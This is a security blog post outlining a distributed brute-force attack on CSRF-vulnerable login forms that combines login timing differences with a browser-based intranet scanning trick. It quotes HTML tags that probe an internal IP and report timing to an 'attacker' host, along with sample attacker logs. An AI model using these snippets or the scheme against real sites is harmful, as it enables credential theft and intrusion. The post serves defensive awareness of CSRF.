« Did Iceland Teen Call Secret White House Phone? | Main | WASC Script Mapping Project released »

Performing Distributed Brute Forcing of CSRF vulnerable login pages

Update:
Apparently this is described in a paper by sensepost that I wasn't aware of. Check out there paper at http://www.sensepost.com/research/squeeza/dc-15-meer_and_slaviero-WP.pdf.

We know that CSRF is bad, and that if your application is performing an important action to utilize a random token associated with the users session. I started thinking a bit about CSRF and timing attacks, Jeremiah Grossman's intranet scanning research and started thinking 'csrf'able login forms + timing attacks + intranet scanning methods = possibly pretty bad?'.

Timing attacks
The sensepost guys had a good talk at blackhat vegas this year on how they identified many websites having response differences if the login was valid/invalid as well if the username was valid/invalid. For example logging in with a valid user may take 200 milliseconds to receive a response whereas an invalid login may take on average 315 milliseconds before receiving a response.

Intranet portscanning tricks
Jeremiah outlined the following in his post

"Here's how its supposed to work... there are the two important lines of HTML:

HTML is hosted on an "attacker" control website.
<* link rel="stylesheet" type="text/css" href="http://192.168.1.100/" />
<* img src="http://attacker/check_time.pl?ip=192.168.1.100&start= epoch_timer" />

The LINK tag has the unique behavior of causing the browser (Firefox) to stop parsing the rest of the web page until its HTTP request (for 192.168.1.100) has finished. The purpose of the IMG tag is as a timer and data transport mechanism back to the attacker. One the web page is loaded, at some point in the future a request is received by check_time.pl. By comparing the current epoch to the initial \x93epoch_timer\x94 value (when the web page was dynamically generated) its possible to tell if the host is up. If the time difference is less than say 5 seconds then likely the host is up, if more, then the host is probably down (browser waited for timeout).

Example (attacker web server logs)

/check_time.pl?ip=192.168.1.100&start=1164762276
Current epoch: 1164762279
(3 second delay) - Host is up

/check_time.pl?ip=192.168.1.100&start=1164762276
Current epoch: 1164762286
(10 second delay) - Host is down

" - Jeremiah 'I wish I was #1 on google when you typed in "Jeremiah"' Grossman

In Jeremiah's example it was a matter of seconds between hosts because offline hosts require a default browser timeout value. His trick utilized the fact that browsers (this may depend on the browser) load resources in order from top to bottom in order. With this piece of information and his trick calling an external resource, one may be able to send requests to a login form via an image tag (or equivalent) and measure the response times in a similar fashion using a logging script. Spread this across a few hundred websites and you have an army of 'visitors' at your command.

* If I were to find a login form CSRF'able I may be able to identify a timing delay in a valid verses invalid login. This would be in milliseconds and would vary from site to site.
* I could utilize the timing tricks outlined by Jeremiah to record initial request time and response time.
* I may be able to identify a valid set of credentials this way, or even just valid usernames.
* If I where to distribute code to this do over a few million page loads of random websites I could redirect tens/hundreds of thousands of people to perform 1-2 credential brute force requests before a captcha is fired.

Considerations

* Login form supports GET (post *may* be possible)
* Each user would lag differently to the site in question, as well as the site containing the timer script
* You may need to logout the user beforehand sending the valid request which is pretty noticeable to the user
* Test requests would be required on a per user basis to establish reasonable timing thresholds for valid verses invalid requests. Depending on the level of sophistication this may be pretty easy to detect.
* A large % of the users performing these requests may have totally random response times/not within a reasonable threshold.
* Not all CSRF'able login forms would be vulnerable or vulnerable enough to notice a timing delay

No I don't plan on making a POC for this as I don't see a POC bringing value. Yet another reason to fix CSRF issues, and yet another use case.

Comments

Feed You can follow this conversation by subscribing to the comment feed for this post.


All Comments are Moderated and will be delayed!


Post a comment







Remember personal info?